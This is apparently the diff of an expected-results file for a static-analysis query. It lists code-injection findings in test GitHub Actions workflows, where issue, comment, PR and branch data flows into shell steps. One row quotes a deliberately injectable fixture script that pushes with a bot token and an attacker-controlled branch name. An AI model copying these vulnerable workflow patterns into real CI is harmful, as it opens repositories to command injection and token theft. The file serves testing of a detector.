| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | workflow_run | edges | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | 
@@ -864,3 +697,170 @@ nodes subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | +#select +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/composite-action-caller-1.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | .github/workflows/test28.yml:12:3:12:21 | pull_request_target | pull_request_target | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | .github/workflows/test29.yml:35:18:35:54 | github.event.pull_request.body | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | ${{ inputs.body }} | .github/workflows/test29.yml:12:3:12:21 | pull_request_target | pull_request_target | +| .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | .github/workflows/test29.yml:12:3:12:21 | pull_request_target | pull_request_target | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | issues | +| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | .github/workflows/artifactpoisoning3.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning4.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | .github/workflows/artifactpoisoning5.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning7.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning8.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 
'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). 
